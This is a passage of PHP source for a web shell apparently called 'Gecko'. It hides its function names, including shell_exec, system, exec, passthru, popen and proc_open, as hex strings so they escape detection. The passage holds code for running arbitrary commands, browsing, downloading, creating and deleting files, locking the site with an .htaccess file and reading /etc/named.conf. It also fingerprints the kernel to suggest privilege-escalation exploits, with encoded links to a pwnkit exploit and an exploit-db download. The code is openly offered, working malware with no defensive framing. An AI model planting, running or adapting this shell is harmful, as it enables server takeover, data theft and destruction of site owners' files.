9 '6368646972', // c h d i r => 10 '7068705f756e616d65', // p h p _ u n a m e => 11 '6973736574', '66756e6374696f6e5f657869737473', '5f6d61645f636d64', '245f5345525645525b275345525645525f4e414d45275d', '676c6f62', // g l o b => 16 '69735f66696c65', // i s _ f i l e => 17 '69735f646972', // i s _ d i r => 18 '69735f7772697461626c65', // i s _ w r i t e a b l e => 19 '69735f7265616461626c65', // i s _ r e a d b l e => 20 '66696c6573697a65', // f i l e _ s i z e => 21 '6765745f63757272656e745f75736572', // user => 22 '5345525645525f534f465457415245', // Server Software => 23 '66696c656d74696d65', // f i l e m t i m e => 24 '746f756368', // t o u c h => 25 '6d6b646972', // m k d i r => 26 '66696c655f6765745f636f6e74656e7473', // f i l e g e t c o n t e n t s => 27 '66696c655f7075745f636f6e74656e7473', // f i l e p u t => 28 '726d646972', // r m d i r => 29 '756e6c696e6b', // u n l i n k => 30 '66696c65', // f i l e => 31 '6d756c7469706172742f666f726d2d64617461', // m u l t i p a r t / f o r m d a t a => 32 '444f43554d454e545f524f4f54', // r o o t d o c => 33 '68747470733a2f2f6769746875622e636f6d2f4d61644578706c6f6974732f50726976656c6567652d657363616c6174696f6e2f7261772f6d61696e2f70776e6b6974', // Source maybe? => 34 '68747470733a2f2f7777772e6578706c6f69742d64622e636f6d2f646f776e6c6f61642f3430383339' // ex => 35 ]; $hitung_array = count($Array); for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unhex($Array[$i]); } if (!empty($_GET['download'])) { $nameNyafile = basename($_GET['download']); $pathFilenya = $fungsi[9]() . "/" . $nameNyafile; if (!empty($nameNyafile) && file_exists($pathFilenya)) { // Define Headers header('Cache-control: public'); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $nameNyafile . '"'); header('Content-Transfer-Encoding: binary'); readfile($pathFilenya); exit; } } ?> Gecko [ <?= $_SERVER['HTTP_HOST']; ?> ]

$val) { if ($val == '' && $id == 0) { echo ' / '; continue; } if ($val == '') continue; echo '' . $val . ' / ' . ''; } ?>
Name Size Permission Date Action
  [ DIR ] '; elseif (!$fungsi[20]($fungsi[9]() . '/' . $dir)) echo ''; echo perms($fungsi[9]() . '/' . $dir); ?>   
  '; } elseif (!$fungsi[20]($fungsi[9]() . '/' . $_file)) { echo ''; } echo perms($fungsi[9]() . '/' . $_file); ?>    

 Create File'; ?>

 Create Folder'; ?>

 

 


Lock Files

') { // pengecekan nama file sekarang $namafile = $_SERVER['SCRIPT_FILENAME']; $fileUtama = explode("/", $namafile); $htaccess_text = ' Order Deny,Allow Deny from all Order Deny, Allow Allow from all '; $document_root = $_SERVER[$fungsi[33]]; $cmd = $fungsi[14]("echo '" . $htaccess_text . "' >> " . $document_root . "/.htaccess"); if ($cmd) { echo success(); } else { echo failed(); } } else { echo failed(); } } if (isset($_POST['submit-lock-file'])) { $fileNama = $_POST['lock-file']; if (file_exists($fileNama)) { $tmp = "/tmp"; _mad_cmd("cp " . $fileNama . " " . $tmp . "/Acx0" . awalanFile($fileNama) . "wplers0x.do.not.remove.this.Lock"); $text = ' '; } function failed() { return ''; } function _mad_cmd($de) { $out = ''; try { if (function_exists('shell_exec')) { return @$GLOBALS['fungsi'][0]($de); } else if (function_exists('system')) { @$GLOBALS['fungsi'][3]($de); } else if (function_exists('exec')) { $exec = array(); @$GLOBALS['fungsi'][1]($de, $exec); $out = @join("\n", $exec); return $exec; } else if (function_exists('passthru')) { @$GLOBALS['fungsi'][2]($de); } else if (function_exists('popen') && function_exists('pclose')) { if (is_resource($f = @$GLOBALS['fungsi'][5]($de, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); return $out; $GLOBALS['fungsi'][6]($f); } } else if (function_exists('proc_open')) { $pipes = array(); $process = @$GLOBALS['fungsi'][4]($de . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @$GLOBALS['fungsi'][8]($pipes[1]); return $out; } else if (class_exists('COM')) { $madWs = new COM('WScript.shell'); $exec = $madWs->$GLOBALS['fungsi'][1]('cmd.exe /c ' . $_POST['alfa1']); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } function unlinkDir($dir) { $dirs = array($dir); $files = array(); for ($i = 0;; $i++) { if (isset($dirs[$i])) $dir = $dirs[$i]; else break; if ($openDir = opendir($dir)) { while ($readDir = @readdir($openDir)) { if ($readDir != "." && $readDir != "..") { if ($GLOBALS['fungsi'][18]($dir . "/" . $readDir)) { $dirs[] = $dir . "/" . $readDir; } else { $files[] = $dir . "/" . $readDir; } } } } } foreach ($files as $file) { $GLOBALS['fungsi'][30]($file); } $dirs = array_reverse($dirs); foreach ($dirs as $dir) { $GLOBALS['fungsi'][29]($dir); } } function formatSize($bytes) { $types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); return (round($bytes, 2) . " " . $types[$i]); } function symlinkDomain() { $d0mains = @file("/etc/named.conf", false); if (!$d0mains) { $dom = "Cant Read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "$count Domain"; } return $dom; } function linux_version() { $pecah = explode(" ", $GLOBALS['fungsi'][11]()); $pcah = explode("-", $pecah[2]); return $pcah[0]; } function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } function unhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } function suggest_exploit() { $uname = $GLOBALS['fungsi'][11](); $xplod = explode(" ", $uname); $xpld = explode("-", $xplod[2]); $pl = explode(".", $xpld[0]); return $pl[0] . "." . $pl[1]; } function distro_linux() { $uname = $GLOBALS['fungsi'][11](); $xplod = explode(" ", $uname); return $xplod[6]; } function kernel_angka() { $uname = $GLOBALS['fungsi'][11](); $xplod = explode(" ", $uname); $xpld = explode("-", $xplod[2]); return $xpld[0]; } function namaFile() { $namesc = $_SERVER['SCRIPT_NAME']; $expl = explode("/", $namesc); return end($expl); } function awalanFile($namas) { $namafile = $namas; $pech = explode(".", $namafile); return $pech[0]; } function pwdnostrip() { $pwd_exists = $GLOBALS['fungsi'][9](); $xpl1 = str_replace("/", "", $pwd_exists); return $xpl1; } ?>